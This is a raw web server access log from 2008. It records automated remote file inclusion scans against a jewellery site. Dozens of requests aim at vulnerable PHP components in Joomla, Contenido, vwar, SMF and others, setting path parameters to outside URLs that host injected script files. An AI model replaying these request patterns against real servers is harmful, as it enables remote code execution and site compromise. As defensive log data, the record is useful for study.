123.214.171.161 - - [30/Oct/2008:20:02:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:20:02:25 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:20:02:25 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:20:02:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:03:18 -0700] "GET /logs/access_080531.log//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:20:03:40 -0700] "GET /logs/access.log//modules/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:20:03:41 -0700] "GET /modules/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:20:03:41 -0700] "GET /logs//modules/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:20:03:41 -0700] "GET /logs/access.log//c/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:20:03:41 -0700] "GET /c/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:20:03:42 -0700] "GET /logs//c/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:04:43 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:04:43 -0700] "GET /logs/access.log%20//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:04:43 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:05:07 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:05:07 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:05:08 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:05:34 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:05:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:05:34 -0700] "GET /logs/access.log%20//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:06:17 -0700] "GET /logs/access_080531.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:06:17 -0700] "GET /logs/access_080531.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:06:22 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:06:37 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:06:37 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:06:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:20:07:32 -0700] "GET /logs/access_080531.log//modules/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:20:07:33 -0700] "GET /logs/access_080531.log//c/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:20:07:56 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:20:07:56 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:20:07:56 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.sojewels.com"
66.79.165.222 - - [30/Oct/2008:20:08:05 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
66.79.165.222 - - [30/Oct/2008:20:08:05 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
66.79.165.222 - - [30/Oct/2008:20:08:05 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:20:09:14 -0700] "GET /db.php?commonpath=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:09:28 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:10:40 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:10:50 -0700] "GET /logs/access_080531.log//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
66.79.165.222 - - [30/Oct/2008:20:14:56 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:20:22:11 -0700] "GET /logs/access_081001.log//db.php?commonpath=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:20:22:12 -0700] "GET /db.php?commonpath=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:20:22:12 -0700] "GET /logs//db.php?commonpath=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Oct/2008:20:22:47 -0700] "GET /logs/access_081001.log//db.php?commonpath=http://www.cr-audio.fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Oct/2008:20:22:48 -0700] "GET /db.php?commonpath=http://www.cr-audio.fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Oct/2008:20:22:48 -0700] "GET /logs//db.php?commonpath=http://www.cr-audio.fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:20:23:06 -0700] "GET /logs/access_080531.log//newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:27:00 -0700] "GET /logs/access_080831.log/vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:27:01 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:27:01 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:20:27:22 -0700] "GET /logs/access.log/index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:20:27:22 -0700] "GET /index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:20:27:22 -0700] "GET /logs/index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:29:03 -0700] "GET /logs/index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:29:03 -0700] "GET /logs/access.log/index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:20:29:03 -0700] "GET /index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:29:06 -0700] "GET /logs/access_080831.log/vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:29:07 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:29:07 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:20:30:56 -0700] "GET /logs/access_081001.log/index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:31:10 -0700] "GET /logs/access_080831.log/vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:31:11 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:20:31:12 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:20:32:36 -0700] "GET /logs/access_080531.log//newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
24.67.0.44 - - [30/Oct/2008:20:32:41 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:33:13 -0700] "GET /logs/index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:33:13 -0700] "GET /logs/access.log/index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:33:13 -0700] "GET /index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:20:34:53 -0700] "GET /logs/access.log%20//newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:35:12 -0700] "GET /logs/access_081001.log/index.php?option=com_restaurante HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
66.79.165.222 - - [30/Oct/2008:20:36:08 -0700] "GET /logs/scripts.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:37:03 -0700] "GET /logs/scripts.log/index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:37:03 -0700] "GET /logs/scripts.log/index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:37:05 -0700] "GET /index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:37:09 -0700] "GET /index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:37:12 -0700] "GET /logs/index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:37:12 -0700] "GET /logs/index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.3.194.35 - - [30/Oct/2008:20:38:29 -0700] "GET /logs/access.log/?sourcedir=http://www.dualm.com/temp/includes/pepekid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.3.194.35 - - [30/Oct/2008:20:38:29 -0700] "GET /logs/?sourcedir=http://www.dualm.com/temp/includes/pepekid.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
195.3.194.35 - - [30/Oct/2008:20:38:29 -0700] "GET /?sourcedir=http://www.dualm.com/temp/includes/pepekid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:20:38:45 -0700] "GET /logs/access.log%20//newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
72.29.68.220 - - [30/Oct/2008:20:38:52 -0700] "GET /logs/access_081001.log//db.php?commonpath=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.29.68.220 - - [30/Oct/2008:20:38:53 -0700] "GET /db.php?commonpath=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.29.68.220 - - [30/Oct/2008:20:38:53 -0700] "GET /logs//db.php?commonpath=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.3.194.35 - - [30/Oct/2008:20:39:07 -0700] "GET /logs/access.log/?sourcedir=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.3.194.35 - - [30/Oct/2008:20:39:07 -0700] "GET /logs/?sourcedir=http://bugisku.com/chid.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
195.3.194.35 - - [30/Oct/2008:20:39:07 -0700] "GET /?sourcedir=http://bugisku.com/chid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:40:49 -0700] "GET /logs/scripts.log/index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:40:53 -0700] "GET /index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:40:59 -0700] "GET /logs/index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:43:04 -0700] "GET /index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:43:06 -0700] "GET /logs/index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:43:36 -0700] "GET /logs/scripts.log/index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:43:44 -0700] "GET /index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:43:53 -0700] "GET /logs/index.php3?act=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:44:51 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:44:52 -0700] "GET /include.php?path[docroot]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:44:52 -0700] "GET /logs//include.php?path[docroot]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:45:43 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:45:44 -0700] "GET /include.php?path[docroot]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:45:44 -0700] "GET /logs//include.php?path[docroot]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:46:42 -0700] "GET /logs/access.log%20//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:47:26 -0700] "GET /logs/access.log//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:47:27 -0700] "GET /authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:47:27 -0700] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:47:49 -0700] "GET /logs/scripts.log/index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:47:54 -0700] "GET /index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:48:05 -0700] "GET /logs/scripts.log/index.php3?pg=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:48:10 -0700] "GET /index.php3?pg=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:48:14 -0700] "GET /logs/index.php3?pg=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:48:45 -0700] "GET /logs/scripts.log/index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:48:46 -0700] "GET /index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:48:51 -0700] "GET /logs/index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:49:30 -0700] "GET /logs/scripts.log/index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:52:28 -0700] "GET /logs/access.log//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:52:29 -0700] "GET /authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:52:30 -0700] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:20:52:45 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:20:52:45 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:20:52:46 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:52:47 -0700] "GET /logs/index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:20:52:50 -0700] "GET /index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
208.80.194.30 - - [30/Oct/2008:20:54:45 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {965F2B26-CF79-BC37-C0DA-E2FE4641CFFD}; .NET CLR 1.1.4322)" "sojewels.com"
216.17.107.161 - - [30/Oct/2008:20:54:45 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:20:54:46 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:20:54:46 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:55:42 -0700] "GET /logs/access_080531.log//include.php?path[docroot]=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
